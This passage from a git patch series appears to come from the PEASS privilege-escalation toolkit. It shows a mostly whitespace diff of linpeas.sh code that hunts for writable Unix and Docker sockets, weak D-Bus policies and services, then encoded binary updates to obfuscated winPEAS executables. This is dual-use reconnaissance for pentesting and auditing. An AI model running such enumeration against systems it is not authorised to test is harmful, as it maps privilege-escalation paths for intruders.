's,^[@\+!-]*,,') printf "%s\n" "$socketslistpaths" | while read sl; do - if [ -w "$sl" ]; then + if [ -w "$sl" ]; then echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; - fi + fi done -done -if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then + done + if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" -fi -if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then + fi + if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" -fi -echo "" + fi + echo "" -print_2title "Unix Sockets Listening" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" -# Search sockets using netstat and ss -unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) -if ! [ "$unix_scks_list" ];then + print_2title "Unix Sockets Listening" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" + # Search sockets using netstat and ss + unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) + if ! [ "$unix_scks_list" ];then unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") -fi -if ! [ "$unix_scks_list" ];then + fi + if ! [ "$unix_scks_list" ];then unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) -fi + fi + + # But also search socket files + unix_scks_list2=$(find / -type s 2>/dev/null) -# But also search socket files -unix_scks_list2=$(find / -type s 2>/dev/null) - -# Detele repeated dockets and check permissions -(printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + # Detele repeated dockets and check permissions + (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do perms="" if [ -r "$l" ]; then - perms="Read " + perms="Read " fi if [ -w "$l" ];then - perms="${perms}Write" + perms="${perms}Write" fi if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; else - echo "$l" | sed -${E} "s,$l,${SED_RED},g" - echo " └─(${RED}${perms}${NC})" - # Try to contact the socket - socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) - if [ $? -eq 0 ]; then + echo "$l" | sed -${E} "s,$l,${SED_RED},g" + echo " └─(${RED}${perms}${NC})" + # Try to contact the socket + socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) + if [ $? -eq 0 ]; then owner=$(ls -l "$s" | cut -d ' ' -f 3) echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" echo "$socketcurl" | head -n 30 + fi fi - fi -done -echo "" + done + echo "" fi #-- PSC) Writable and weak policies in D-Bus config files print_2title "D-Bus config files" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" if [ "$PSTORAGE_DBUS" ]; then -printf "%s\n" "$PSTORAGE_DBUS" | while read d; do + printf "%s\n" "$PSTORAGE_DBUS" | while read d; do for f in $d/*; do - if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + if ! [ "$IAMROOT" ] && [ -w "$f" ]; then echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" - fi + fi - genpol=$(grep "" "$f" 2>/dev/null) - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi + genpol=$(grep "" "$f" 2>/dev/null) + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi - userpol=$(grep "/dev/null | grep -v "root") - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #for g in `groups`; do - # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi - #done - grppol=$(grep "/dev/null | grep -v "root") - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + userpol=$(grep "/dev/null | grep -v "root") + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #for g in `groups`; do + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi + #done + grppol=$(grep "/dev/null | grep -v "root") + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #TODO: identify allows in context="default" + #TODO: identify allows in context="default" done -done + done fi echo "" @@ -1881,24 +1882,24 @@ print_2title "D-Bus Service Objects list" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" dbuslist=$(busctl list 2>/dev/null) if [ "$dbuslist" ]; then -busctl list | while read line; do + busctl list | while read line; do echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; if ! echo "$line" | grep -qE "$dbuslistG"; then - srvc_object=$(echo $line | cut -d " " -f1) - srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') - if [ "$srvc_object_info" ]; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') + if [ "$srvc_object_info" ]; then echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," + fi fi - fi -done + done else echo_not_found "busctl" fi fi -echo'' -echo'' +echo '' +echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -if echo $CHECKS | grep -q network_information; +if echo $CHECKS | grep -q network_information; then print_title "Network Information" ########################################### #---------) Network Information (---------# @@ -2077,11 +2078,11 @@ if [ "$MACOS" ]; then echo "" fi fi -echo'' -echo'' +echo '' +echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -if echo $CHECKS | grep -q users_information; +if echo $CHECKS | grep -q users_information; then print_title "Users Information" ########################################### #----------) Users Information (----------# @@ -2310,11 +2311,11 @@ else fi print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC fi -echo'' -echo'' +echo '' +echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -if echo $CHECKS | grep -q software_information; +if echo $CHECKS | grep -q software_information; then print_title "Software Information" ########################################### #--------) Software Information (---------# @@ -3163,11 +3164,11 @@ echo "" fi -echo'' -echo'' +echo '' +echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -if echo $CHECKS | grep -q interesting_files; +if echo $CHECKS | grep -q interesting_files; then print_title "Interesting Files" ########################################### #----------) Interesting files (----------# @@ -3809,6 +3810,6 @@ if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then echo "" fi fi -echo'' -echo'' +echo '' +echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi From a7f161a40d0049c840ade69aa0df7e2fce64edb6 Mon Sep 17 00:00:00 2001 From: CI-winpeas Date: Sat, 18 Dec 2021 22:57:53 +0000 Subject: [PATCH 4/5] winpeas binaries auto update --- .../Dotfuscated/any/winPEASany.exe | Bin 1795584 -> 1795584 bytes .../Dotfuscated/x64/winPEASx64.exe | Bin 1794560 -> 1795072 bytes .../Dotfuscated/x86/winPEASx86.exe | Bin 1795584 -> 1795584 bytes .../Obfuscated Releases/winPEASany.exe | Bin 1795584 -> 1795584 bytes .../Obfuscated Releases/winPEASx64.exe | Bin 1794560 -> 1795072 bytes .../Obfuscated Releases/winPEASx86.exe | Bin 1795584 -> 1795584 bytes .../binaries/Release/winPEASany.exe | Bin 1928192 -> 1928704 bytes .../binaries/x64/Release/winPEASx64.exe | Bin 1927680 -> 1927680 bytes .../binaries/x86/Release/winPEASx86.exe | Bin 1928192 -> 1928704 bytes 9 files changed, 0 insertions(+), 0 deletions(-) diff --git a/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/any/winPEASany.exe b/winPEAS/winPEASexe/binaries/Obfuscated Releases/Dotfuscated/any/winPEASany.exe index 3d7079422f2a1fcb8fa08a82f4339b43ac5947e2..3c5249bf771f3b7729efec39d50e0ad2ff3bf2c9 100644 GIT binary patch delta 1726 zcmXZddvwor9LMqZ@AupLHTr$uwwYaQll@HTvPyGX3zLz%O=1b5nY%Wdnr+!{F11Rf z7v)p>2uEW@&0_z_utR?e9HGuFW)=;g{M4I zCT^`<(8|5FwDRrY&8C&cOQvv@$4j+V`XU$kTw~ljMlPD`Dr;B8pN*?8bBjvCL6fYv zOkDgvVS+#2^h#B4SDvBv3PAxs%qC~Lx+vg?9bZtv<>LKdgEBrs=- zHz829#j8QzGH<7ln4C$uIa3SM65HhGjw>uI&FI@ZW5CeaZGwYVcza&a{<$+}76*K1 zyNu~T%diVlM)EebD{!?@lIB7 z;Y&_Mr;6Bp4l~w_g|ToJ!I}qS_eDOu-~ZBCN8Z!bv|0zAb7ZYn({);X(UJA~J$+wK z(hXWiH|o>|M}k^+$&nBA3f-ih%Z_YT&%cg*s7drAO}ggD7M)19>WB1Wt)tsCTTDLD zAlKjROm=Az-K|A#lTS5BKhp({$>+Kt++>f2Mwsl?(3U1&Xdk*y zv+0)_p!+pQztSW0fX2j`9Mk~)T9?y9Ix@xNuuh~$w2*$I@1*!mzSV|~CP(!e{Z7+6 znS8J5-AsPajr2#|MUUxedR!-TH#wmN^d~K&wfYP_sY~f8U7BukTHl~Q>uUOoo~OU+ z-}E;P>0wf*vGk0#rDrv{hxz54CigO_*W`gF=QVkd$puZN7j-dh&}H;@T{g_*lCGkc zbtk=|hv**~HQeM+ok6ea2Ktv?qJOI^+vFc@O8?b<^qOj(i6DZyFoe1>n)*H1#1Vo` z`6h}b1w83kQfLy26|@Q7rA@JkUWc93i?67I6V%XhmPs>=pkXMY;Rwxe>**9bTq4VHLd@Yw0c6LT|+dnv96~Cbz-wa!Aa+-=~>0Nk@rr|AmH<~cauip3@a zQL)5i5E|%UG%Pd8MC9wdv(TCjL4e+e<#Z^zEH}9yMRXYI>2O@3+3-~PO&)-U*W3ss z(FZYrjzl&ch3smR(a50>p^%P&pN_=>Iu3j2!|<*($w3Sqk8GNYBXk04=|t4iNyu4e zG8q9n1xM&q)Y56F-OTep9kts{9zlm1lROmCd=$|c_>vajJ6ed7bS7HtFnJVX>0>xX zi;%R_WEMKmVgzXkYG^4uyG$NO4V?|oZj&;EQ9r^yH7Q5fev>&UKEOjg7f*A{!>b1> zN>;XDQ7oFpu-IV9%9d-!hL=2fxa|tNp;y)AQ&kC9=Z>pL4T%e;hQu$-?&5CMIW4to zT3SY0@2-7%b<0Ta*?nM9->kAUUU?tXdtVhq5U(a!rsfi4NVuShTP}$UqPPdzf{2KMqItnvU}Fv9 zMmcKZ;8atLOITMebJt8$sSHgm&C*QG5DRyEoaxMbKkqqn{yXQL`Q;zU$Ul;?WKo@M z6E~JDZsCm2EBSa-gR65rGE{iwdt{TA7L50VENkVM;OvvKY@uU8n}|Hmqn9#(IYni4 zrAgvPCJsKIH^HqBT@um9Q5uwF?R<&OqC}^IJ(_h`08<7Q$m+6stiC_d=_+3p5FG80 z(sesr%}aOfaH&6XjVmU=pR>*tSL+X2wb)uJJpQh9OdW9a)T6$1x#pG*^b(kDd zm&@cEbu~0OtVQ&Q7KNF7s|V>(t)j;?tf|Ryjir^EOuy4o`n`sQoBW_H=?Og@W%8q5 zqE%W$Pip&UugNLR?ridtdg*E1NzdrcZYF27OLvo>wIBUOr_ytJk)GEZ^jCdAFKGQ9 zCckMY{ar)jO)hFHdPzIbKXeAYtn=xg`UbtC@6xNfo?g@Pc=O6%THf2_x|R<#`CH2e znN;gmdP747o789vdQ)4BH2Ftc(|@%ut<@xYOIOg_T21e0Op?i6olWm)0llwp(Fb~n zKGZieOavv=flBJcS?aBWxalSVh|4rlG|A#lqRC8?Kt$5I=t%1!j@CzC>cTMU#$;-E zFUO<-PSJ*_rHv4qYZ8Q>G#CkUOd2DVh9HwRK`{+Q@qCjo;B}LxUKDbKV<~Nh-~}cg zq|oL_;jd|d9Qqg*(w5jmBXE>P;sI@i;rS+yBZ)qNqym%HSV5n}ZQ2Im3r*UhHEoAz z`V@N5_Q;|gP(nMxyN;t1F4L!BK9eYf(`dA&&mfw1#uWN2s%Z?W7n^j!eHsgS+vGX8 zX&joNngPQ`YOUUo4kf(nvPUD4XN9>{~1W#Z89AdG!r#+25M;* zhVC($iLo>rX>=Br)7dyjb1-qQNiNFh98}P`h}~zBhXgtgJ~|%>`%PYlk1jwl^`iKI zNj{2?niSynaW3^j)T=b{!BbguXMG53!a`XXYwEwVK77NZMukBs4NI%G4=G=MBIc8m zb$b_W)n@*!>M2f+jT@Pfm6@HDm6tU?d%?U}c{y`u`!;xsDhmCDTMCm#C66AHA`p7-A~PtK9}oa6C}=QZs*<={m5 z|GO(K#qMSoiC(gRfg(Zt6{cKM(3nRLdn@|GprbSo{=LANa_)*`xHi>fWzp_k}Ry+(Iw72T~fYAkVS)qP9$ zXe}*K_Xn2jRrkl1?9&jsUqk9FIiOSMLET3WX%+oaqr}Kp>Y|7B94*z$4vr&QMUUzX zn~^e2r^hti&B$?e(XX|@GIBx-yo{XGdfrC9(R$5{e5?KFDUG71)k)8&i=NfDBf1;;Nq5tqwTxcY z8}y1!?qTGrCevRun^x+4dQDf*>$)Ps$PN9N{;FH)Z+e&hu8-&+>e16kmHN}0+KS%N z(4NL2w>7knkvkeX$jDs{9c<*DcA?d}jMnH{`lqfPY2?0crVsQetC_7@>WxFRF-kLy_@I(D!5!)g&nzQN;hAm3 z5ARcd2jDQ$42@|3meN36pv`e1$H-H7K%a)&93w5ziw0o`4MsL?iEo8ZA|vAv zOUEOHPJn~Ppny)qNjeGkVk5Eeqi-RK#^F4jj7mBMcj#2aZZ|RwPC6au=?qlTnW)^$ z{f|fGVIyy&L#dGjq|ij9(UaE+#-$q^&(Acm&lGEGOwQ6m}XKr`W@StzBm z;9h3rU6j(Hq zMT}Qn`<<7!jhNYU{)y4^Zj~2)lHbK6z}3Yga8Xo9kI~6#sTpZ$jd zZ5*6x8pb89i2>PW^gAvo(;T{6J@j++JaowyT0+0nl1DDtqgUxy+Plsrdo`Wz z(+av@V;;NYfR3XFb-J75kfzhadYvB8T6$D##pIaAI82VK(`oXxIvbgs(0qDQ^Mg#j z(WCT~R?yQL6l`)vV`#Z1(Qmbwey2epCf{o-`h%W}H2G1l(h9AiKWTWB+vKcfbvOB0 z-SnL9rRQ~TZ<7n!vyaI|9ZY}GS@e=#p_jFq{;GAfQvLgy{HB5QcMa@kaz)$Hs~SQ7 z(7E)QE}?(w>-4(5OK<2FdQ(gLnOpwS(g7y7v~-xsZ7oeOsnRl9t<8p;)M!h3M_Z0J z`CB{Ce{>M7)kJz%*V21hMel2LqR9hYKp*Nd`bgiRb$XmW);BUt1clUra_WN%)Ljp; zb4+{@n`xqGK94Jj=JQSb(1zAWXW9U<)E|SW6Jw|gsnqaZwn;;rrHxQa0}zvA(ir_| z6T~evX^J%344Je!3TPk-mY4(qOHG2^c#|Upt7!`~dCepg$utbf{4_0*O`kv>ZG{80 zHBQkssH1H$HrJ#b5@~xRE;H$Xwe(5cqfa3u&!i(d&`yY=Popml$2=N=LfRSb%^Y2D zjdq23Od=6NqtJnNLlo_fnY0J0Xf&!;nDoRW8UuOTq!(N?7Gd-mbfmqpoc6(8+84en zP5L2#_D2|f77_G0%%%gd!Oane^Q%k-BBjt|5N6ZCsH8)1i^k&t9SXnICc`jj|w&TS^CNTAPS1x-USoq-BE6G_`mW+9EffK2)# zD(OoI+F|lCl4v^8=xn6z=Kg0OZNJGJ?4+5fp>t77=V8O6r3_yhI?nY)Ol!7ZsI{` zdH($^%~*35$bwj~_x_fUttkQFSsxEu9JglRwq6@AE?PQvPJWrT@Rn(4K~lS>U4|qK v9g&bQK4HR$iHRe}j~+K_>hejcD^m(n-bv{i8P%PU7uz8AxnC7$M?1gc58>^WP=EIbM`LbH9Hml=}vpY9@d$- zwlMUV#SE*<{FpxrVD-GA#{$Qma4)@K$rrkTmT3Q*mTb}zx>-x^Sh7Vg&@c50-KrII zn@*~-#H$r|E%{2T>2`J8vt)-l9$B(eqv+Qf_1KbKnoM`=PP#`c=w5Y+k#E#X_vvX` zsu$fH`?Z3W=_H$x1DZn*YL4B=A@$O4b&h4^u+H%}azuRtj2u5o6>BO{Qlxi~gwVW86l5(yBH_&go-%USr!DxuCI~ zjQp(I=r4MJUes&!l8*0e-+SIE}>U-Nvx4;x|;r`8|d$Pi~gYx>7VM; z#YlyQ((Brk-q7eS#w|BBy1S7|jqY#cmPQXSa$DQeJGzKg=?eOnt{7_MuCAr`w2W5k z8G2uXh8g)=Gw1`|O8?Qj^r6~ZM*h{>^pW(sM~?<96s2dZbY#- zlP4XEvyAv+6|IHOX>Dw$bx=l~I7uyBrUnhB8mWun)DJn-A6^=OJ+vN5bBzR|oYqGr z4T9e^Bf;>?Hxhz(Xs8=-8)<-gGz<%9IL^_AI9Fh#5$@3^V4q>6F}l(S45X3Br%iB* zM&S%?iZe5fJc*!LMxH`0ZH8s^X{@Eqv57u|UG!PprqKwPZKMUV3!E0_fqUh`B zM@PU#N5WNNWE2wVXk^iNxakxET zKQUo)%Ge3xk`ptQr%qXwy*7JwcDL?5diLUjvgrS}rRIIvShJ5PiVU_F=XruhhEMg@ V9UcBa?Rz_V1IC3{+KO8F{s+cI;kW<* delta 1648 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 